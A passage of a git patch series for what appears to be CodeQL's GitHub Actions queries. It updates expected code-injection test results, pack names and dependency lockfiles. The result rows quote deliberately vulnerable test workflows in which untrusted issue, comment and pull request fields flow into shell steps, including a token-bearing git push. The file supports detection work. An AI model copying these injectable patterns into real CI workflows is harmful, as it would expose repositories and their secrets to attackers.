steps.git-commit.outputs.file-list | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 
'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | .github/workflows/image_link_generator.yml:4:3:4:15 | issue_comment | issue_comment | | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 605fa2924ff8..b341ac198536 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -8,16 +8,12 @@ edges | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | provenance | | | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | provenance | | | .github/actions/action5/action.yml:28:16:28:45 | github.event.issue.body | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | 
.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log 
| provenance | | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | provenance | | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | provenance | | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | +| .github/actions/external/ultralytics/actions/action.yaml:66:3:66:6 | input body | .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | provenance | | | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | 
provenance | | @@ -53,7 +49,7 @@ edges | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | provenance | | | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | provenance | | | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | provenance | | -| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | provenance | | +| .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | provenance | | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | provenance | | 
@@ -61,6 +57,11 @@ edges | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | provenance | | | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | provenance | | | .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | provenance | | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | provenance | | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | provenance | | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | 
input taint | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | provenance | | | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | provenance | | | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | provenance | | 
@@ -98,7 +99,7 @@ edges | .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | provenance | | | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | -| .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | provenance | | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | provenance | | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | provenance | | 
@@ -211,6 +212,7 @@ edges | .github/workflows/test27.yml:35:9:41:6 | Uses Step | .github/workflows/test27.yml:43:14:44:66 | echo "chart_version=$(> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | -| 
.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | semmle.label | env.log | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | semmle.label | input title | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | semmle.label | output Job outputs node [result] | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | semmle.label | steps.out.outputs.replaced | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | semmle.label | inputs.title | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | semmle.label | Uses Step: out [replaced] | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | semmle.label | inputs.title | +| .github/actions/external/ultralytics/actions/action.yaml:66:3:66:6 | input body | semmle.label | input body | +| .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | semmle.label | inputs.body | +| .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | semmle.label | github.head_ref \|\| github.ref | | 
.github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | 
@@ -336,6 +331,16 @@ nodes | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | semmle.label | github.event.discussion.title | | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | semmle.label | Run Step: git-commit [file-list] | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global 
user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | semmle.label | github.event.changes.title.from | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | semmle.label | env.log | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | semmle.label | env.prev_log | | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | semmle.label | github.event.pages[1].title | | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | semmle.label | 
github.event.pages[11].title | | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | semmle.label | github.event.pages[0].page_name | @@ -621,6 +626,7 @@ nodes | .github/workflows/test27.yml:41:9:46:2 | Run Step: get-version [chart_version] | semmle.label | Run Step: get-version [chart_version] | | .github/workflows/test27.yml:43:14:44:66 | echo "chart_version=$( Date: Fri, 13 Dec 2024 12:33:22 -0500 Subject: [PATCH 688/707] Fix pack names --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- ql/test/qlpack.yml | 1 - 3 files changed, 2 insertions(+), 3 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index a848e8684fbf..9c2633ff3923 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -1,7 +1,7 @@ --- library: true warnOnImplicitThis: true -name: github/actions-all +name: codeql/actions-all version: 0.2.2 dependencies: codeql/util: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index c8d5a9f4ce3b..5fbb863d746c 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,6 +1,6 @@ --- library: false -name: github/actions-queries +name: codeql/actions-queries version: 0.2.2 groups: [actions, queries] suites: codeql-suites diff --git a/ql/test/qlpack.yml b/ql/test/qlpack.yml index 893532481eca..668474866fce 100644 --- a/ql/test/qlpack.yml +++ b/ql/test/qlpack.yml @@ -7,4 +7,3 @@ dependencies: extractor: actions tests: . warnOnImplicitThis: true - From 5aa3328b07d3b45f700d3baa3b1290d01d894fc1 Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Fri, 13 Dec 2024 12:46:39 -0500 Subject: [PATCH 689/707] Upgrade to latest package versions --- ql/lib/codeql-pack.lock.yml | 24 +++++++++++++----------- ql/src/codeql-pack.lock.yml | 24 +++++++++++++----------- ql/test/codeql-pack.lock.yml | 24 +++++++++++++----------- 3 files changed, 39 insertions(+), 33 deletions(-) diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml index c4ef87bc2512..2f4b6f858370 100644 --- a/ql/lib/codeql-pack.lock.yml 
+++ b/ql/lib/codeql-pack.lock.yml @@ -2,25 +2,27 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 1.0.10 + version: 1.0.12 codeql/dataflow: - version: 1.1.4 + version: 1.1.6 codeql/javascript-all: - version: 2.0.2 + version: 2.1.1 codeql/mad: - version: 1.0.10 + version: 1.0.12 codeql/regex: - version: 1.0.10 + version: 1.0.12 codeql/ssa: - version: 1.0.10 + version: 1.0.12 + codeql/threat-models: + version: 1.0.12 codeql/tutorial: - version: 1.0.10 + version: 1.0.12 codeql/typetracking: - version: 1.0.10 + version: 1.0.12 codeql/util: - version: 1.0.10 + version: 1.0.12 codeql/xml: - version: 1.0.10 + version: 1.0.12 codeql/yaml: - version: 1.0.10 + version: 1.0.12 compiled: false diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml index c4ef87bc2512..2f4b6f858370 100644 --- a/ql/src/codeql-pack.lock.yml +++ b/ql/src/codeql-pack.lock.yml @@ -2,25 +2,27 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 1.0.10 + version: 1.0.12 codeql/dataflow: - version: 1.1.4 + version: 1.1.6 codeql/javascript-all: - version: 2.0.2 + version: 2.1.1 codeql/mad: - version: 1.0.10 + version: 1.0.12 codeql/regex: - version: 1.0.10 + version: 1.0.12 codeql/ssa: - version: 1.0.10 + version: 1.0.12 + codeql/threat-models: + version: 1.0.12 codeql/tutorial: - version: 1.0.10 + version: 1.0.12 codeql/typetracking: - version: 1.0.10 + version: 1.0.12 codeql/util: - version: 1.0.10 + version: 1.0.12 codeql/xml: - version: 1.0.10 + version: 1.0.12 codeql/yaml: - version: 1.0.10 + version: 1.0.12 compiled: false diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml index c4ef87bc2512..2f4b6f858370 100644 --- a/ql/test/codeql-pack.lock.yml +++ b/ql/test/codeql-pack.lock.yml 
@@ -2,25 +2,27 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 1.0.10 + version: 1.0.12 codeql/dataflow: - version: 1.1.4 + version: 1.1.6 codeql/javascript-all: - version: 2.0.2 + version: 2.1.1 codeql/mad: - version: 1.0.10 + version: 1.0.12 codeql/regex: - version: 1.0.10 + version: 1.0.12 codeql/ssa: - version: 1.0.10 + version: 1.0.12 + codeql/threat-models: + version: 1.0.12 codeql/tutorial: - version: 1.0.10 + version: 1.0.12 codeql/typetracking: - version: 1.0.10 + version: 1.0.12 codeql/util: - version: 1.0.10 + version: 1.0.12 codeql/xml: - version: 1.0.10 + version: 1.0.12 codeql/yaml: - version: 1.0.10 + version: 1.0.12 compiled: false From 1fb707f080fb44fcd9a639acc488d5b5ca02bea2 Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Fri, 13 Dec 2024 13:00:24 -0500 Subject: [PATCH 690/707] Bump minor version to prepare for public release --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 9c2633ff3923..4bc32f934d9b 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: codeql/actions-all -version: 0.2.2 +version: 0.3.0 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 5fbb863d746c..70f1e4945a1c 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 